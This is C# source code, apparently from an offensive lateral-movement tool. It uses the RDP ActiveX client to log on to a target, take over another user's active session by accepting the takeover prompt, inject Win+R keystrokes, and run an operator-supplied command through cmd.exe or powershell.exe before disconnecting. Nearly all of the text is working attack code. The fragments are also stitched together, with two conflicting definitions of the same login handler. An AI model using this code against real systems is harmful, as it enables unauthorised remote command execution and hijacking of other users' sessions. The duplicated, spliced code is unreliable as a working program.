private void RdpConnectionOnOnLogonError(object sender, IMsTscAxEvents_OnLogonErrorEvent e)
{
LogonErrorCode = e.lError;
var errorstatus = Enum.GetName(typeof(LogonErrors), (uint)LogonErrorCode);
Console.WriteLine("[-] Logon Error : {0} - {1}", LogonErrorCode, errorstatus);
Thread.Sleep(1000);
if (LogonErrorCode == -5 && takeover == true)
{
// it doesn't go to the logon event, so this has to be done here
var rdpSession = (AxMsRdpClient9NotSafeForScripting)sender;
Thread.Sleep(1000);
keydata = (IMsRdpClientNonScriptable)rdpSession.GetOcx();
Console.WriteLine("[+] Another user is logged on, asking to take over session");
SendElement("Tab");
Thread.Sleep(500);
SendElement("Enter+down");
Thread.Sleep(500);
SendElement("Enter+up");
Thread.Sleep(500);
Console.WriteLine("[+] Sleeping for 30 seconds");
Task.Delay(31000).GetAwaiter().GetResult();
Marshal.ReleaseComObject(rdpSession);
Marshal.ReleaseComObject(keydata);
}
else if (LogonErrorCode != -2)
{
Environment.Exit(0);
}
}
public unsafe static void Send(Keys[] keyCodes, ServerBase serverBase)
{
Server serverNode = serverBase.ServerNode;
RdpClient client = serverNode.Client;
IMsRdpClientNonScriptable msRdpClientNonScriptable = (IMsRdpClientNonScriptable)client.GetOcx();
int num = keyCodes.Length;
try
{
SendKeysData sendKeysData = default(SendKeysData);
bool * ptr = (bool *)sendKeysData.keyUp;
int * ptr2 = sendKeysData.keyData;
int num2 = 0;
for (int i = 0; i < num && i < 10; i++)
{
int num3 = (int)Util.MapVirtualKey((uint)keyCodes[i], 0u);
sendKeysData.keyData[num2] = num3;
sendKeysData.keyUp[num2++] = 0;
if (!IsModifier(keyCodes[i]))
{
for (int num4 = num2 - 1; num4 >= 0; num4--)
{
sendKeysData.keyData[num2] = sendKeysData.keyData[num4];
sendKeysData.keyUp[num2++] = 1;
}
msRdpClientNonScriptable.SendKeys(num2, ref *ptr, ref *ptr2);
num2 = 0;
}
}
}
catch
{
}
}
private void RdpConnectionOnOnLoginComplete(object sender, EventArgs e)
{
var rdpSession = (AxMsRdpClient9NotSafeForScripting)sender;
Console.WriteLine("[+] Connected to : {0}", target);
Thread.Sleep(1000);
keydata = (IMsRdpClientNonScriptable)rdpSession.GetOcx();
if (LogonErrorCode == -2)
{
Console.WriteLine("[+] User not currently logged in, creating new session");
Task.Delay(10000).GetAwaiter().GetResult();
}
string privinfo = "non-elevated";
if (runtype != string.Empty)
{
privinfo = "elevated";
}
Console.WriteLine("[+] Execution priv type : {0}", privinfo);
Thread.Sleep(1000);
SendElement("Win+R+down");
Thread.Sleep(500);
SendElement("Win+R+up");
Thread.Sleep(1000);
if (execwith == "cmd")
{
RunConsole("cmd.exe");
}
else if (execwith == "powershell" || execwith == "ps")
{
RunConsole("powershell.exe");
}
else
{
RunRun();
}
Thread.Sleep(1000);
Console.WriteLine("[+] Disconnecting from : {0}", target);
rdpSession.Disconnect();
}
private void RdpConnectionOnOnLoginComplete(object sender, EventArgs e)
{
if (LogonErrorCode == -2)
{
Console.WriteLine($"[+] User not currently logged in, creating new session");
Task.Delay(10000).GetAwaiter().GetResult();
}
var rdpSession = (AxMsRdpClient9NotSafeForScripting)sender;
Console.WriteLine("[+] Connected to : {0}", target);
Thread.Sleep(1000);
keydata = (IMsRdpClientNonScriptable)rdpSession.GetOcx();
string enterdown = "Enter+down";
string enterup = "Enter+up";
Thread.Sleep(1000);
SendElement("Win+R+down");
Thread.Sleep(500);
SendElement("Win+R+up");
Thread.Sleep(1000);
if (execwith == "cmd")
{
Console.WriteLine("[+] Executing {0} from cmd.exe", cmd.ToLower());
SendText("cmd.exe");
Thread.Sleep(1000);
SendElement(enterdown);
Thread.Sleep(500);
SendElement(enterup);
Thread.Sleep(500);
SendText(cmd.ToLower());
Thread.Sleep(1000);
SendElement(enterdown);
Thread.Sleep(500);
SendElement(enterup);
Thread.Sleep(500);
SendText("exit");
}
else if (execwith == "powershell" || execwith == "ps")
{
Console.WriteLine("[+] Executing {0} from powershell.exe", cmd.ToLower());
SendText("powershell.exe");
Thread.Sleep(1000);
SendElement(enterdown);
Thread.Sleep(500);
SendElement(enterup);
Thread.Sleep(500);
SendText(cmd.ToLower());
Thread.Sleep(1000);
SendElement(enterdown);
Thread.Sleep(500);
SendElement(enterup);
Thread.Sleep(500);
SendText("exit");
}
else
{
Console.WriteLine("[+] Executing {0}", cmd.ToLower());
SendText(cmd.ToLower());
Thread.Sleep(1500);
SendElement(enterdown);
Thread.Sleep(500);
SendElement(enterup);
}
Thread.Sleep(1000);
Console.WriteLine("[+] Disconnecting from : {0}", target);
rdpSession.Disconnect();
}
